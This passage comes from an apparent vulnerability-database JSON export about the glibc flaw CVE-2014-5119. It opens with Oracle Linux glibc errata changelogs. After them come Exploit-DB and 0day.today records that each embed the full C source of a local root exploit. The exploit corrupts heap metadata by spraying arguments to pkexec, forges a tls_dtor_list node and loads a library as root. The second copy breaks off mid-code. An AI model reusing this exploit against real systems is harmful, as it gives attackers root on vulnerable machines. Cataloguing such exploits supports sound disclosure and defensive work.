wildcard values in getnetgrent from nscd (#1085290).\n- Avoid overlapping addresses to stpcpy calls in nscd (#1083644).\n- Initialize all of datahead structure in nscd (#1083646).\n[2.17-58]\n- Remove gconv transliteration loadable modules support (CVE-2014-5119,\n - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475,\n[2.17-57]\n- Merge 64-bit ARM (AArch64) support (#1027179).\n- Fix build failure for rtkaio/tst-aiod2.c and rtkaio/tst-aiod3.c.\n[2.17-56]\n- Merge LE 64-bit POWER support (#1125513).\n[2.17-55.4]\n- Fix tst-cancel4, tst-cancelx4, tst-cancel5, and tst-cancelx5 for all targets.\n- Fix tst-ildoubl, and tst-ldouble for POWER.\n- Allow LE 64-bit POWER to build with VSX if enabled (#1124048).\n[2.17-55.3]\n- Fix ppc64le ABI issue with pthread_atfork being present in libpthread.so.0.\n[2.17-55.2]\n- Add ABI baseline for 64-bit POWER LE.\n[2.17-55.1]\n- Add 64-bit POWER LE support.", "modified": "2015-03-09T00:00:00", "published": "2015-03-09T00:00:00", "id": "ELSA-2015-0327", "href": "http://linux.oracle.com/errata/ELSA-2015-0327.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:41", "bulletinFamily": "unix", "description": "[2.12-1.149.4]\n- Fix recursive dlopen() (#1173469).\n[2.12-1.149.3]\n- Fix typo in res_send and res_query (#rh1172023).\n[2.12-1.149.2]\n- Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040, #1139571).\n[2.12-1.149.1]\n- Fix wordexp() to honour WRDE_NOCMD (CVE-2014-7817, #1170121).", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "id": "ELSA-2015-0016", "href": "http://linux.oracle.com/errata/ELSA-2015-0016.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "unix", "description": "[2.12-1.132.4]\n- Remove gconv 
transliteration loadable modules support (CVE-2014-5119,\n - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475,", "modified": "2014-08-29T00:00:00", "published": "2014-08-29T00:00:00", "id": "ELSA-2014-1110", "href": "http://linux.oracle.com/errata/ELSA-2014-1110.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T21:09:50", "bulletinFamily": "exploit", "description": "glibc Off-by-One NUL Byte gconv_translit_find Exploit. CVE-2014-5119. Local exploit for linux platform", "modified": "2014-08-27T00:00:00", "published": "2014-08-27T00:00:00", "id": "EDB-ID:34421", "href": "https://www.exploit-db.com/exploits/34421/", "type": "exploitdb", "title": "glibc - Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "//\r\n// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz)\r\n//\r\n//\r\n// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <taviso@cmpxhg8b.com>\r\n// Chris Evans <scarybeasts@gmail.com>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n\r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic 
char * const kCorruptCharsetEnviron[] = {\r\n \"CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\r\n NULL,\r\n};\r\n\r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n\r\nstatic const struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n\r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n\r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n\r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n\r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n\r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n\r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n\r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n\r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, \"[*] \"); break;\r\n case LOG_WARN: fprintf(stderr, \"[*] \"); break;\r\n case LOG_ERROR: fprintf(stderr, \"[!] 
\"); break;\r\n }\r\n\r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n\r\n fputc('\\n', stderr);\r\n\r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n\r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n\r\n logmessage(LOG_DEBUG, \"Attempting to invoke pseudo-pty helper (this will take a few seconds)...\");\r\n\r\n if ((pty = popen(\"./pty\", \"r\")) == NULL) {\r\n logmessage(LOG_ERROR, \"failed to execute pseudo-pty helper utility, cannot continue\");\r\n }\r\n\r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, \"failed to read output from pseudo-pty helper, %d (%m)\", count, message);\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"Read %u bytes of output from pseudo-pty helper, parsing...\", count);\r\n\r\n pclose(pty);\r\n\r\n mallocerror = strstr(message, \"corrupted double-linked list\");\r\n memorymap = strstr(message, \"======= Memory map: ========\");\r\n\r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, \"expected output missing (this is 
normal), trying again...\");\r\n continue;\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"pseudo-pty helper succeeded\");\r\n break;\r\n }\r\n\r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n\r\n logmessage(LOG_DEBUG, \"attempting to parse libc fatal error message...\");\r\n\r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, \"unable to locate required error messages in crash dump\");\r\n }\r\n\r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, \"corrupted double-linked list: %p ***\", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, \"having trouble parsing this error message: %.20s\", mallocerror);\r\n };\r\n\r\n logmessage(LOG_DEBUG, \"discovered chunk pointer from `%.20s...`, => %p\", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, \"attempting to parse the libc maps dump...\");\r\n\r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, \"\\n\"); prev = line, line = NULL) {\r\n char filename[32];\r\n\r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n\r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, \"======= Memory map: ========\") == 0) {\r\n continue;\r\n }\r\n\r\n if (sscanf(line, \"%08x-%08x %c%c%c%c %*8x %*s %*u %31s\", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n\r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, \"[heap]\") == 0) {\r\n logmessage(LOG_DEBUG, \"successfully located first morecore chunk w/tag @%p\", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n\r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, \"[stack]\") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, \"no [heap] tag was found, using heuristic...\");\r\n if 
(sscanf(anon, \"%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s\", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, \"expected to find heap location in line `%s`, but failed\", anon);\r\n }\r\n logmessage(LOG_DEBUG, \"located first morecore chunk w/o tag@%p\", *baseaddr);\r\n }\r\n\r\n if (strcmp(filename, \"/usr/lib/libc-2.18.so\") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, \"found libc.so mapped @%p\", mapstart);\r\n *libcaddr = mapstart;\r\n }\r\n\r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, \"expecting libc.so bss to begin at %p\", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n\r\n logmessage(LOG_ERROR, \"unable to parse maps line `%s`, quiting\", line);\r\n break;\r\n }\r\n\r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;\r\n}\r\n\r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n\r\nstatic const size_t nstrings = 15840000;\r\n\r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n\r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = \"./exploit.so\";\r\n\r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n\r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, \"failed to query kernel information\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"---------------------------------------------------\");\r\n logmessage(LOG_DEBUG, \"CVE-2014-5119 glibc __gconv_translit_find() exploit\");\r\n logmessage(LOG_DEBUG, \"------------------------ taviso & scarybeasts -----\");\r\n\r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access(\"/etc/fedora-release\", 
F_OK) != 0 || strcmp(ubuf.machine, \"i686\") != 0)\r\n logmessage(LOG_WARN, \"This proof of concept is designed for 32 bit Fedora 20\");\r\n\r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, \"unable to parse libc fatal error message, please try again.\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"allocating space for argument structure...\");\r\n\r\n // This number of \"-u\" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, \"allocating argument structure failed\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"creating command string...\");\r\n\r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n\r\n logmessage(LOG_DEBUG, \"creating a tls_dtor_list node...\");\r\n\r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. 
That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n\r\n logmessage(LOG_DEBUG, \"open_translit() symbol will be at %p\", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, \"offsetof(struct known_trans, fname) => %u\", offsetof(known_t, fname));\r\n\r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n\r\n logmessage(LOG_DEBUG, \"appending `%s` to list node\", kExploitDso);\r\n\r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n\r\n logmessage(LOG_DEBUG, \"building parameter list...\");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = \"-u\";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n\r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n\r\n logmessage(LOG_DEBUG, \"anticipating tls_dtor_list to be at %p\", bssaddr + kTlsDtorListOffset);\r\n\r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize = 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param = NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n .bk_nextsize = baseaddr + 8,\r\n };\r\n\r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n\r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n\r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n\r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n\r\n if (chunkpageoffset > 
targetpageoffset) {\r\n continue;\r\n }\r\n\r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n\r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n\r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, \"parameter %u would contain a nul, skipping\", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n\r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n\r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n\r\n args[0] = \"pkexec\";\r\n\r\n logmessage(LOG_DEBUG, \"execvpe(%s...)...\", args[0]);\r\n execvpe(\"pkexec\", args, kCorruptCharsetEnviron);\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34421/"}], "zdt": [{"lastseen": "2018-03-21T00:17:39", "bulletinFamily": "exploit", "description": "glibc __gconv_translit_find() single-fixed-byte heap metadata overflow local root exploit for Fedora 20 32-bit. 
This issue is not specific to Fedora, but the proof of concept is specifically for Fedora 20 32-bit.", "modified": "2014-08-27T00:00:00", "published": "2014-08-27T00:00:00", "id": "1337DAY-ID-22553", "href": "https://0day.today/exploit/description/22553", "type": "zdt", "title": "glibc Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <[email\u00a0protected]>\r\n// Chris Evans <[email\u00a0protected]>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n \r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n \r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic char * const kCorruptCharsetEnviron[] = {\r\n \"CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\r\n NULL,\r\n};\r\n \r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n \r\nstatic const struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n \r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n \r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n 
uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n \r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n \r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n \r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n \r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n \r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n \r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, \"[*] \"); break;\r\n case LOG_WARN: fprintf(stderr, \"[*] \"); break;\r\n case LOG_ERROR: fprintf(stderr, \"[!] \"); break;\r\n }\r\n \r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n \r\n fputc('\\n', stderr);\r\n \r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n \r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. 
This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n \r\n logmessage(LOG_DEBUG, \"Attempting to invoke pseudo-pty helper (this will take a few seconds)...\");\r\n \r\n if ((pty = popen(\"./pty\", \"r\")) == NULL) {\r\n logmessage(LOG_ERROR, \"failed to execute pseudo-pty helper utility, cannot continue\");\r\n }\r\n \r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, \"failed to read output from pseudo-pty helper, %d (%m)\", count, message);\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"Read %u bytes of output from pseudo-pty helper, parsing...\", count);\r\n \r\n pclose(pty);\r\n \r\n mallocerror = strstr(message, \"corrupted double-linked list\");\r\n memorymap = strstr(message, \"======= Memory map: ========\");\r\n \r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, \"expected output missing (this is normal), trying again...\");\r\n continue;\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"pseudo-pty helper succeeded\");\r\n break;\r\n }\r\n \r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n \r\n logmessage(LOG_DEBUG, \"attempting to parse libc fatal error message...\");\r\n \r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, \"unable to locate required error messages in crash dump\");\r\n }\r\n \r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, \"corrupted double-linked list: %p ***\", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, \"having trouble parsing this error message: %.20s\", mallocerror);\r\n };\r\n \r\n logmessage(LOG_DEBUG, \"discovered chunk pointer from `%.20s...`, => %p\", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, \"attempting to parse the libc maps dump...\");\r\n 
\r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, \"\\n\"); prev = line, line = NULL) {\r\n char filename[32];\r\n \r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n \r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, \"======= Memory map: ========\") == 0) {\r\n continue;\r\n }\r\n \r\n if (sscanf(line, \"%08x-%08x %c%c%c%c %*8x %*s %*u %31s\", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n \r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, \"[heap]\") == 0) {\r\n logmessage(LOG_DEBUG, \"successfully located first morecore chunk w/tag @%p\", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n \r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, \"[stack]\") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, \"no [heap] tag was found, using heuristic...\");\r\n if (sscanf(anon, \"%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s\", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, \"expected to find heap location in line `%s`, but failed\", anon);\r\n }\r\n logmessage(LOG_DEBUG, \"located first morecore chunk w/o tag@%p\", *baseaddr);\r\n }\r\n \r\n if (strcmp(filename, \"/usr/lib/libc-2.18.so\") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, \"found libc.so mapped @%p\", mapstart);\r\n *libcaddr = mapstart;\r\n }\r\n \r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, \"expecting libc.so bss to begin at %p\", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n \r\n logmessage(LOG_ERROR, \"unable to parse maps line `%s`, quiting\", line);\r\n break;\r\n }\r\n \r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ?
1 : 0;\r\n}\r\n \r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n \r\nstatic const size_t nstrings = 15840000;\r\n \r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n \r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = \"./exploit.so\";\r\n \r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n \r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, \"failed to query kernel information\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"---------------------------------------------------\");\r\n logmessage(LOG_DEBUG, \"CVE-2014-5119 glibc __gconv_translit_find() exploit\");\r\n logmessage(LOG_DEBUG, \"------------------------ taviso & scarybeasts -----\");\r\n \r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access(\"/etc/fedora-release\", F_OK) != 0 || strcmp(ubuf.machine, \"i686\") != 0)\r\n logmessage(LOG_WARN, \"This proof of concept is designed for 32 bit Fedora 20\");\r\n \r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, \"unable to parse libc fatal error message, please try again.\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"allocating space for argument structure...\");\r\n \r\n // This number of \"-u\" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, \"allocating argument 
structure failed\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"creating command string...\");\r\n \r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n \r\n logmessage(LOG_DEBUG, \"creating a tls_dtor_list node...\");\r\n \r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n \r\n logmessage(LOG_DEBUG, \"open_translit() symbol will be at %p\", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, \"offsetof(struct known_trans, fname) => %u\", offsetof(known_t, fname));\r\n \r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n \r\n logmessage(LOG_DEBUG, \"appending `%s` to list node\", kExploitDso);\r\n \r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n \r\n logmessage(LOG_DEBUG, \"building parameter list...\");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = \"-u\";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n \r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n \r\n logmessage(LOG_DEBUG, \"anticipating tls_dtor_list to be at %p\", bssaddr + kTlsDtorListOffset);\r\n \r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize = 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param 